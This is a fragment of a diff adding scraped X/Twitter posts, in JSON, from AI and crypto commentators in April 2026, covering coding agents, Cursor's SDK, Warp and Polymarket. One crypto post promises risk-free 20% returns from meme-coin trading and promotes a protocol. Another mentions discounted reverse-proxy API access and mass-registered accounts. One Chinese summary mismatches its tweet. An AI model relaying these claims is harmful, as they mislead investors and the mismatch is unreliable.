"OpenAI将在5月5日17:55举办模型派对,以Codex筛选嘉宾并采纳用户创意,暗示持续强化社区参与与迭代模式" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "🧠 你以为的币圈财富自由:\n\n在 AAVE 里存 500 万美金,每天躺赚几百刀利息,结果 AAVE 差点出大问题,钱包差点归零,每天那点利息最后发现是把本金放在火山口上烤🔥\n\n👇\n真正的币圈财富自由:\n\n500 万美金,全放链上钱包,不存任何协议,不图那点所谓的稳定收益。每天拿 1000 美金冲链,Solana 土狗、ETH 土狗、BSC 土狗,轮着扫🧵\n\n💥 核心纪律(必须遵守):\n1. 亏损 20% 立刻割,不装死\n2. 翻倍立刻出本,利润继续跑\n3. 涨了慢慢卖,不格局,每天日结\n4. 绝不恋战,从不留恋任何一个币\n\n严格执行这个计划,每个月的大金狗都能吃到🐕\n\n半年随便赚 50 万美金,一年轻松 100 万美金\n\n500 万本金,年化 20% 稳稳到手\n\n⚠️ 没有协议风险、没有跑路风险、没有清算风险\n唯一的风险就是你自己不守纪律\n\n这就是真正意义上的财务自由\n\n另外再介绍下 >@TermMaxFi Termmax 是一个去中心化合约交易协议,采用独特的“到期交割型”永续合约模式。与 AAVE 这类依赖流动性池的借贷协议不同,Termmax 的底层逻辑是让用户在明确的交割周期内完成杠杆交易,期间无需担心资金费率累积或被对手盘定向狙击🔥\n\n该协议的核心优势在于:资金效率更高,不锁仓用户资产,所有交易行为均在链上公开可查,用户的每一笔委托、每一次开平仓都能在链上追踪。此外,Termmax 还引入了类似期权结构的风控模型,在一定程度上降低了穿仓分摊的可能性。\n\n简单来说,Termmax 是一套更适合链上合约玩家的交易基础设施,而非资金托管平台。如果你想在链上玩合约,又不想把资金存放在别人的流动性池里,可以关注一下这个方向🧵", + "url": "https://x.com/chuxiaeth/status/2049651534003351701", + "published_at": "2026-04-30T00:46:21+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "2026年了,如果一个“人”突然积极回复你的每一条内容,只有一种可能:他用 AI 自动回复的。点进他主页一看,同一时间,同时回复了十几个人。\n\n上一次有人这么积极回复,还是因为爱情。。。", + "url": "https://x.com/dingyi/status/2049648150605123629", + "published_at": "2026-04-30T00:32:54+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "Trump's war on science.", + "url": "https://x.com/ylecun/status/2049641252287607241", + "published_at": "2026-04-30T00:05:29+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "没建工作流前,每天起床打开 X 刷一会儿就开始焦虑——爆款看不完、KOL 推文跟不上、PM 平台又升级了不知道哪条该 follow。\n\n现在每天 30 分钟跑一次 /today + /morning,把当天外部信息流梳成可执行清单:\n\n合计 31 条 · 预计 6-8h 消化完\n\n每条都明确动作:写推 / 评估装不装 / 扫一眼跳过 / 私享给付费读者 / 进 backlog 推到周日。\n\n跑完那一刻焦虑感一下消失——不是因为信息少了,是因为每条都已经被计划好,知道做不做、什么时候做。\n\n简直是 INTJ 的极度舒适时刻!😂\n\n用的就是 Claude Code + 我自己写的两个 skill:/today 看内部(策略 / 在途任务 / 本周目标),/morning 扫外部(KOL 爆款 / GitHub trending / TG 23 频道 / PM 平台变更 / L3 AI 行业 / 私聊 / 深读 ≥3 篇)。\n\n明天起床又会有新的 30+ 条,但这就是日常。舒服😌", + "url": "https://x.com/runes_leo/status/2049631565710528661", + "published_at": "2026-04-29T23:27:00+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "今日在大阪,欢迎约饭👋", + "url": "https://x.com/Stv_Lynn/status/2049631472693448778", + "published_at": "2026-04-29T23:26:38+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: One sign that the Stockholm startup ecosystem is finally great is that founders from all over Europe are now moving there to start startups. I met several of them today and they were excellent. h/t @mattiasmiksche", + "url": "https://x.com/paulg/status/2049629445674135795", + "published_at": "2026-04-29T23:18:34+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"Most people are not ready for the AI future inside companies.\n\nIt requires a real step change in skills and mindset.\n\nAnd as companies transition, not adapting will become a blocker, which is why more layoffs are likely.\"\n\nWhat do employees not know that all of them should know @jasonlk @moraitakis @karrisaarinen @PawelHuryn", + "url": "https://x.com/HarryStebbings/status/2049629049174057023", + "published_at": "2026-04-29T23:17:00+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "What is best Italian in SF?", + "url": "https://x.com/eladgil/status/2049625013310120188", + "published_at": "2026-04-29T23:00:58+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump’s FCC chair, Brendan Carr, says he plans to punish and potentially revoke broadcast licenses for TV networks critical of the Trump administration:\n\n“I’d be surprised if we don’t go down the path of license revocation for some. It will be up to them and their conduct.”\n\nThis is fascism. This is what they do in authoritarian countries.\n\nThis is cancel culture on steroids.\n\nWhere’s the outrage?", + "url": "https://x.com/ylecun/status/2049621796736180438", + "published_at": "2026-04-29T22:48:11+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Really enjoyed this conversation w @tferriss", + "url": "https://x.com/eladgil/status/2049620148123001125", + "published_at": "2026-04-29T22:41:38+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "RT by @frxiaobei: x.com/i/article/204961669954…", + "url": "https://x.com/frxiaobei/status/2049617833370202182", + "published_at": "2026-04-29T22:32:26+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: NEW podcast episode is up! \n\nElad Gil (@eladgil), Consigliere to Empire Builders — How to Spot Billion-Dollar Companies Before Everyone Else, The Misty AI Frontier, How Coke Beat Pepsi, When Consensus Pays, and Much More\n\nElad Gil (@eladgil) is CEO of Gil & Co, a multi-stage investment firm, holding company, and operating company working on the world’s most advanced technologies. \n\nElad is a serial entrepreneur, operating executive, and investor or advisor to private companies, including AirBnB, Anduril, Coinbase, Figma, Instacart, OpenAI, SpaceX, and Stripe. \n\nHe was previously VP of Corporate Strategy at Twitter and started mobile at Google. He was the founder and CEO of Mixerlabs and Color. \n\nElad is the author of the bestseller High Growth Handbook: Scaling Startups from 10 to 10,000 People.\n\nPlease enjoy!", + "url": "https://x.com/eladgil/status/2049615184730132940", + "published_at": "2026-04-29T22:21:54+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"The problem with short sellers is the asymmetry.\n\nThey can take positions, publish dramatic reports and profit from market reactions with little downside if they are wrong.\n\nMeanwhile, public companies are heavily regulated and cannot respond as freely, creating an uneven playing field.\"\n\nWhat would you most like to change about the way short sellers operate @chamath @BillAckman @jeffiel @davidsacks @elonmusk", + "url": "https://x.com/HarryStebbings/status/2049604386628960684", + "published_at": "2026-04-29T21:39:00+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Jessica and I have been talking about how earnest Swedish founders seem. Obviously it's news to no one that Swedes would be earnest. But I don't think they themselves realize how valuable this quality is for founders specifically.\n\nhttps://paulgraham.com/earnest.html", + "url": "https://x.com/paulg/status/2049596317244997710", + "published_at": "2026-04-29T21:06:56+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "A lot of people say they want to win, but the honest truth is they don’t.\n\nWanting to win is it consuming you. It being an obsession. It keeping you up at night, physically hurting you that you want to win that much.\n\nThat is wanting to win, the rest is just words.", + "url": "https://x.com/HarryStebbings/status/2049591116928877011", + "published_at": "2026-04-29T20:46:16+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Science is how we’ve cured diseases and how we just sent four humans around the Moon. It’s a big reason why we’re the greatest country on Earth, but firing the National Science Board shows just how much Trump doesn’t understand that.", + "url": "https://x.com/ylecun/status/2049590329871904801", + "published_at": "2026-04-29T20:43:08+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"Really good people figure things out on their own.\n\nThey do not need constant mentorship, reviews or handholding.\n\nIf someone needs that level of support, they are likely not the kind of A player you want on the team.\"\n\nLove to hear your thoughts on this @anjneymidha @thejustinwelsh @harleyf @tfadell", + "url": "https://x.com/HarryStebbings/status/2049575949344157929", + "published_at": "2026-04-29T19:46:00+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: This is what an impending midterm disaster looks like for Republicans. https://trib.al/eLV1GmR", + "url": "https://x.com/ylecun/status/2049561899189055901", + "published_at": "2026-04-29T18:50:10+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "RT by @GoSailGlobal: Starting today, agents can now be Cloudflare customers. They can create a Cloudflare account, start a paid subscription, register a domain, and get back an API token to deploy code right away. https://cfl.re/4sY0Uxn", + "url": "https://x.com/GoSailGlobal/status/2049545195914498139", + "published_at": "2026-04-29T17:43:48+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Why this $160 billion company does not have a product organization?\n\n\"We do not have a separate product organization, our engineers are the product managers.\n\nIn an AI native world, engineers need to be imaginative and think in terms of product, not just code.\n\nThey may not write every line themselves, but they must understand, review and own the output.\"\n\nWhat do product teams of the future look like @karrisaarinen @zoink @GergelyOrosz @lennysan @gustavs", + "url": "https://x.com/HarryStebbings/status/2049543233735106652", + "published_at": "2026-04-29T17:36:00+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "全局md里面我之前只设置了CuiMao,没设定我的中文,所以老是乱翻译。下次干活先让他去市面上打听打听我的信息,然后再回来给我干活。事半功倍。", + "url": "https://x.com/CuiMao/status/2049533641563484523", + "published_at": "2026-04-29T16:57:53+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "R to @CuiMao: github.com/Cuimao777/cuimao-…", + "url": "https://x.com/CuiMao/status/2049529840349614318", + "published_at": "2026-04-29T16:42:47+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "RT by @CuiMao: Deepseek v4挺好的,接入claude code花了5.65块,把英语原版的30万字汉化成了EPUB,结果还有模有样的,借鉴了宝玉 @dotey 的Skill做了节省token的优化处理方案。评论区拿skill", + "url": "https://x.com/CuiMao/status/2049529746279796864", + "published_at": "2026-04-29T16:42:24+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I think it is still unclear to me whether the gap between \"data in training set\" v.s. \"data in SKILL.md\" can be closed with further training on more SKILL.md, assuming latent reasoning will never materialize.", + "url": "https://x.com/liuliu/status/2049526702334972397", + "published_at": "2026-04-29T16:30:18+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "君子生非异也,善假于 AI 也。\n— A子", + "url": "https://x.com/0xAA_Science/status/2049525966628958553", + "published_at": "2026-04-29T16:27:23+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "到香港后发现带的是大陆转英标的插座,崩溃", + "url": "https://x.com/Stv_Lynn/status/2049522162411995640", + "published_at": "2026-04-29T16:12:16+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: You can now ask Gemini to create Docs, Sheets, Slides, PDFs, and more directly in your chat. No more copying, pasting, or reformatting, just prompt and download.\n\nAvailable globally for all @GeminiApp users.", + "url": "https://x.com/JeffDean/status/2049519281600373159", + "published_at": "2026-04-29T16:00:49+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "刚好今天下午跟团队开会,聊到了 Symphony。\n\n过去这段时间团队手搓了一套系统,想解决一个很现实的问题:\n别再让产品和技术被各自的工具链锁住了。\n\n现阶段虽然 AI Coding 大家虽然玩的很溜,但认知上还未对齐,还在遵守老的规范,产品做需求,做完需求评审,评审完以后技术守着 codex、claude code 或者 cursor 这种本地工具,开发协作还是靠人肉对齐,整个过程其实很割裂,效率也不稳定。\n\n这个平台做的事情很简单粗暴,要把这些能力收敛到同一套平台里,让 coding 从人驱动工具切换变成 Agent 任务驱动。\n\n今天刚好讨论的一个关键点就是任务要用 Symphony 串起来。\n\n什么意思?\n\n就是以后团队里任何一个人,只要不颠覆大的设计目标,都可以直接提需求 → AI 自动拆解 → 自动构建 → 自动交付初版。\n\n所有人要做的事情只剩两件,提需求、验证、兜底。\n\n你可能会说,OpenAI、Authoropic 这些公司已经这么干了,但其实对于我们来说,现阶段可能刚刚好。\n\n现状是开发到提测这个流程是没什么问题了,接下来我们打算把产品也收到这里边来,测试也尝试对接进来,看看到底能走到一哪一步。", + "url": "https://x.com/frxiaobei/status/2049516252281135554", + "published_at": "2026-04-29T15:48:47+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "今天才发现自己 80.8% 的 Claude Code skill 是装废的。\n\n读 Tw93 这篇学到了,description 写\"用于 X / X workflow\"是\"功能介绍型\",AI 主线程根本看不到何时该调它。\n\n52 个 skill 一直纳闷 codeburn 这个月 subagent 调用率为啥才 0.18%,可能的原因找到了。\n\n今天全改成 Use when + NOT when,1-2 周后回来对账。👀", + "url": "https://x.com/runes_leo/status/2049513537966674317", + "published_at": "2026-04-29T15:38:00+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "Ling-2.6-flash is now open-source! A 104B MoE (7.4B active) built for agents. Ling-2.6-1T will follow today.\n\nHugging Face: https://huggingface.co/inclusionAI/Ling-2.6-flash\nModelScope: https://modelscope.cn/models/inclusionAI/Ling-2.6-flash\n\nDeploy on your own devices: https://recipes.vllm.ai/inclusionAI/Ling-2.6-flash?hardware=h200", + "url": "https://x.com/dingyi/status/2049507438156787936", + "published_at": "2026-04-29T15:13:45+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Do Rich Founders Make For Bigger Exits:\n\n\"In 2015, we got approached to sell the business for hundreds of millions of dollars, all cash.\n\nHad I not had the singles before, it might have been something that was very enticing to just cash out the whole thing at that point in time.\n\nBut because I knew my bank account was sound, I wasn't in it for money. I was trying to build big and really I felt like this had to be the home run.\" Adam Foroughi, @AppLovin\n\nHave you found that founders with prior wealth are correlated with larger exits due to their ability to go big @chadbyers @semil @honam @pitdesi?", + "url": "https://x.com/HarryStebbings/status/2049504982261714970", + "published_at": "2026-04-29T15:04:00+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "睡觉醒来,有 400 个好心人关注我,祝我破 10w 粉丝数吗?", + "url": "https://x.com/lxfater/status/2049501643071180855", + "published_at": "2026-04-29T14:50:44+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: Customers like Rippling, Notion, C3 AI, and Faire are using the Cursor SDK to build custom background agents, take bugs from ticket to merge-ready PR, and maintain self-healing codebases.\n\nLearn more: http://cursor.com/blog/typescript-sdk", + "url": "https://x.com/cursor_ai/status/2049499876388454903", + "published_at": "2026-04-29T14:43:43+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: We've open-sourced a few starter projects for you to build on: a coding agent CLI, a prototyping tool, and an agent-powered kanban board.\n\nUse Cursor to customize them for your use case:\nhttp://github.com/cursor/cookbook", + "url": "https://x.com/cursor_ai/status/2049499874043830389", + "published_at": "2026-04-29T14:43:42+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: With the Cursor SDK, you can run agents locally or deploy them in our cloud.", + "url": "https://x.com/cursor_ai/status/2049499871980200082", + "published_at": "2026-04-29T14:43:42+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "We’re introducing the Cursor SDK so you can build agents with the same runtime, harness, and models that power Cursor.\n\nRun agents from CI/CD pipelines, create automations for end-to-end workflows, or embed agents directly inside your products.", + "url": "https://x.com/cursor_ai/status/2049499866217185492", + "published_at": "2026-04-29T14:43:40+00:00", + "source": "nitter", + "title_zh": "Cursor推出安全审查功能,通过AI代理提供代码漏洞检测与日程扫描服务,拓展企业级开发安全管理场景" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "RT by @frxiaobei: We’re introducing the Cursor SDK so you can build agents with the same runtime, harness, and models that power Cursor.\n\nRun agents from CI/CD pipelines, create automations for end-to-end workflows, or embed agents directly inside your products.", + "url": "https://x.com/frxiaobei/status/2049499866217185492", + "published_at": "2026-04-29T14:43:40+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: i meant a goblin moment, sorry", + "url": "https://x.com/sama/status/2049493797114126484", + "published_at": "2026-04-29T14:19:33+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Demis Hassabis (@demishassabis) has had one of the most extraordinary careers in tech.\n\nHe started as a chess prodigy and video game designer at 17 before getting a PhD in neuroscience and going on to found DeepMind. His lab cracked Go, solved protein structure prediction with AlphaFold, and then gave it away free to every scientist on earth. That work won him the 2024 Nobel Prize in Chemistry. Today he leads @GoogleDeepMind, pushing toward the same goal he set as a teenager: AGI. \n\nOn this special live episode of How to Build the Future, he sat down with YC's @garrytan to talk about what still needs to happen to get us to AGI, his advice for founders on how to stay ahead of the curve, and what the next big scientific breakthroughs might be.\n\n01:48 — What’s Missing Before We Get To AGI?\n03:36 — Why Memory Is Still Unsolved\n06:14 — How AlphaGo Shaped Gemini\n08:06 — Why Smaller Models Are Getting So Powerful\n10:46 — The 1000x Engineer\n12:40 — Continual Learning and the Future of Agents\n13:32 — Why AI Still Fails at Basic Reasoning\n15:33 — Are Agents Overhyped or Just Getting Started?\n18:31 — Can AI Become Truly Creative?\n20:26 — Open Models, Gemma, and Local AI\n22:26 — Why Gemini Was Built Multimodal\n24:08 — What Happens When Inference Gets Cheap?\n25:24 — From AlphaFold to the Virtual Cells\n28:24 — AI as the Ultimate Tool for Science\n30:43 — Advice for Founders\n33:30 — The AlphaFold Breakthrough Pattern\n35:20 — Can AI Make Real Scientific Discoveries?\n37:59 — What to Build Before AGI Arrives", + "url": "https://x.com/paulg/status/2049489217953374689", + "published_at": "2026-04-29T14:01:21+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "加了一些 AI 大 V 的微信才发现,原来,朋友圈都是孩子的日常,都是当爹的人了,孩子老大了。", + "url": "https://x.com/CuiMao/status/2049480920001114551", + "published_at": "2026-04-29T13:28:23+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "Day 5 — Cursor 送的 $10K 刚烧到 $164,刚 1.64%。慢得我自己都着急。\n\n本来以为\"路还长\",今天才发现不是慢的问题,是方向错了。\n\n我现在 3 个 worker 并行在跑:白天我自己开 Claude / Codex 终端推任务,夜里 Codex loop 烧策略 / 数据基座的额度,Cursor 24/7 跑 daemon 一直不停。\n\n之前我把 Cursor 这个 loop 当成\"独立的产物 worker\"——跑批量产物(spec / outline / copy),跟 Claude / Codex 各干各的,专业分工。\n\n今天被自己打回重写。\n\nCursor 后端就有 claude-4.7 + gpt-5.5 模型,本来就能干 Claude / Codex 的活。目前感觉适合自己系统的角色是\"前置助理\"——研究 / 初稿 / 批量改 / 审计扫描这些前置部分给它跑,主线(白天我 + 夜间 Codex loop)只做最后一公里的判断和定稿。\n\n这份算力放在\"前置\"位置,给主线省 token,整个工作流的密度都拉起来。比让它孤立产物值多了。\n\n通用模式不止 Cursor:\n- ChatGPT 重度用户 → GPT-4o-mini 跑前置 → GPT-5 主线判断\n- Claude Code 重度用户 → Haiku subagent 跑前置 → Opus 主线判断\n- 任何多模型工作流 → 把便宜模型放在贵模型主线之前\n\n把贵的留在最后一公里。\n\n5/31 之前还有 32 天。接下来我计划逐渐让它融入我的主要工作流程。", + "url": "https://x.com/runes_leo/status/2049477802978664657", + "published_at": "2026-04-29T13:16:00+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "Github and critical work are becoming incompatible", + "url": "https://x.com/soumithchintala/status/2049475649157374146", + "published_at": "2026-04-29T13:07:26+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "已经有朋友联系我能提供0.5折的 Claude 反向代理API,还有朋友免费注册了几万个 ChatGPT plus 账号,长见识了。\n\n建了个 WTF AI 电报群,欢迎加入,申请时记得自我介绍下: \nhttps://t.me/+ZCnxv1CA0u5jMmU1", + "url": "https://x.com/0xAA_Science/status/2049462724216987766", + "published_at": "2026-04-29T12:16:05+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: \"A decade ago, AI was supposed to replace radiologists. Today, radiologists make more than $500,000 per year, and their employment continues to grow, see chart below. Reading scans is a task, not a job, and when the task gets cheaper, demand for the job grows.\"", + "url": "https://x.com/ylecun/status/2049456071278747804", + "published_at": "2026-04-29T11:49:39+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "Polymarket V2 cutover 24 小时观察。\n\n把十几个策略账户的 USDC.e 全部迁到 pUSD,verify + smoke PASS。一起来观察下第一天的市场反应。\n\n---\n\n【数据层】@lnkybtc 秋田老师的链上数据最直观:\n\n• V2 部署后 4 小时,pUSD 发行 1.7 亿美元,186 万笔转账,68,686 个持有地址\n• 6 小时内,PM TVL 4.5 亿里有 2 亿(40%)转成了 pUSD\n• 利息原本上交 Circle,现在 PM 自己拿——2028 大选 4% 年化补贴的资金来源问题解决了\n• 但代价是:链上协议独立性解除,pUSD 和 PM 链下信用强绑定(V1 时代你能自己 merge 回 USDC,PM 停摆也不影响)\n\n---\n\n【实操层】我自己社群(http://t.me/runesgang)24h 真实痛点:\n\n技术派:\n• \"V2 的 SDK 识别不到 pUSD\"\n• \"前端已经 pusd 了,后端 redeem 还是 usdce\"——前后端口径不一致\n• merge() 老仓位还得走 USDC.e 中转,不能直接出 pUSD\n\n困惑派:\n• \"这个 pusd 到底是干嘛的我都搞不懂了\"\n• \"非包装一层 pusd 有啥好处\"\n• \"那这 V2 升的点用没有\"\n\n少数正面:\n• \"V2 跑起来感觉好多了\"(撮合延迟、签名都顺了)\n\n---\n\n【判断】\n\n工程方向是对的(pUSD 原生化 + EIP-712 标准化 + 砍掉 nonce 攻击面),产品节奏猛了点——从公告到强制迁移 < 72h。\n\n链上数字漂亮(4 小时 1.7 亿 pUSD),社群一片懵逼(\"包一层有啥好处\"),中间差着几天工程消化期。\n\n官方有这个动作,搞策略的顺着规则走——该调整就调整,正常推进策略迭代,后续持续关注变化。\n\nhttps://polymarket.com/?r=tgpublic&via=runes-leo&utm_source=x&utm_content=v2-cutover-observation&v…", + "url": "https://x.com/runes_leo/status/2049450372285046792", + "published_at": "2026-04-29T11:27:00+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "Anthropic ships changelogs. OpenAI ships vibes.", + "url": "https://x.com/runes_leo/status/2049438052310020226", + "published_at": "2026-04-29T10:38:03+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "Warp 昨晚开源了。\n\nGitHub_Daily 写的时候是 34000 Star,刚去看已经 38k+。\n\nWarp 不只是个终端,定位是 ADE(Agentic Development Environment)。内置自家编码 Agent,也支持接入 Claude Code、Codex、Gemini CLI、Kimi CLI 这些外部 CLI Agent,一个窗口里啥都能跑。\n\n几个观察:\n\n第一,协议是 AGPL,不是 MIT。意思是个人爱怎么用怎么用,但你要拿去做云服务卖钱,整个改动都得开源。MongoDB、Redis 那条防白嫖的老路。\n\n第二,\"终端 → 开发环境平台\"这个转型挺有意思。Cursor 从编辑器起家往下卷,Warp 从终端起家往上走,两边都在做同一件事:把 IDE、终端、Agent 折叠成一个东西。\n\n第三,开放接入别人的 Agent 是聪明的一手。自己内置一套,但承认你可能更想用 Claude Code 或者 Codex。开门做,比关门打有意思。\n\n对个人开发者来说,以前的标配是 iTerm + Cursor + Claude Code 三件套来回切,现在一个 Warp 就够了。\n\nhttp://github.com/warpdotdev/warp", + "url": "https://x.com/bozhou_ai/status/2049436870963085429", + "published_at": "2026-04-29T10:33:21+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "MIT 静悄悄放了 12 本 AI 教材出来,全部免费。同样内容去美国念个学位,学费要 5 万美元。\n\ncyrilXBT 整理的清单,分四类。\n\n【基础】\n\n1. Foundations of Machine Learning(Mohri 等):经典 ML 教材,PAC 学习理论到核方法\nhttps://cs.nyu.edu/~mohri/mlbook/\n\n2. Mathematics for Machine Learning:ML 背后的线代、概率、微积分\nhttps://mml-book.github.io/\n\n3. Probabilistic Machine Learning Part 2(Kevin Murphy):概率视角下的 ML 高级篇\nhttps://probml.github.io/pml-book/book2.html\n\n【深度学习】\n\n4. Deep Learning(Goodfellow/Bengio/Courville):业内俗称\"花书\"\nhttps://www.deeplearningbook.org/\n\n5. Understanding Deep Learning(Simon Prince):2025 新版,配 Python notebook,比花书更新更友好\nhttps://udlbook.github.io/udlbook/\n\n【强化学习】\n\n6. Reinforcement Learning: An Introduction(Sutton & Barto):RL 圣经,做 Agent 必看\nhttp://incompleteideas.net/book/the-book-2nd.html\n\n7. Distributional Reinforcement Learning:第一本系统讲分布式 RL 的教材\nhttps://www.distributional-rl.org/\n\n8. Multi-Agent Reinforcement Learning:多 Agent 协作完整入门\nhttps://www.marl-book.com/\n\n【应用与工程】\n\n9. Foundations of Computer Vision(Torralba 等):现代 CV 全景图\nhttps://visionbook.mit.edu/\n\n10. Machine Learning Systems:ML 模型的系统工程化\nhttps://mlsysbook.ai/\n\n11. Machine Learning in Production:从模型到真正的产品\nhttps://mlip-cmu.github.io/book/\n\n12. Fairness and Machine Learning:AI 公平性问题\nhttps://fairmlbook.org/\n\n啃下来需要一点数学和编程基础。如果你只是想\"了解 AI\",这些书太硬,去找科普书更合适。但要真搞懂 AI 是怎么回事的人,看这些比看 100 篇科普文章都管用。", + "url": "https://x.com/bozhou_ai/status/2049436668663390575", + "published_at": "2026-04-29T10:32:33+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "Claude Code 加了 push 通知,任务跑完手机叫你,让你能从终端走开。\n\n但通知再快也是要人读的。我并不想读。\n\n我有几个 TG 频道接监控,策略告警/异常/系统/信号分开收,每天未读消息几十条。但还是要我自己打开看:是真需要动手处理,还是又一次正常状态监控。这跟没提醒区别不大。\n\n懒人的真需求不是\"通知更快\",是 AI 替我读完那条告警,归类、判断、给一行结论:这条 P0 现在去改 / 这条系统自愈了别管 / 这条留到周日复盘。\n\n然后我只看结论那一行,拍板即可。\n\n工具厂都在卷\"通知到手机更快\",但没人卷\"替你读完\"。这才是 worker 该有的样子。", + "url": "https://x.com/runes_leo/status/2049423498494566836", + "published_at": "2026-04-29T09:40:13+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "这个动效设计 skills 真好!\n\nnpx skills add jakubantalik/transitions-dev", + "url": "https://x.com/dingyi/status/2049423162933395583", + "published_at": "2026-04-29T09:38:53+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: I think Scott Aaronson's previous blog posts were abundantly clear already, but well... here we have it.", + "url": "https://x.com/paulg/status/2049419661855338641", + "published_at": "2026-04-29T09:24:58+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "Deepseek好像要发多模态的了,好好睁开眼睛看看这个世界吧!", + "url": "https://x.com/CuiMao/status/2049397079177592925", + "published_at": "2026-04-29T07:55:14+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "x.com/i/article/204921670329…", + "url": "https://x.com/CuiMao/status/2049394392776290573", + "published_at": "2026-04-29T07:44:33+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": 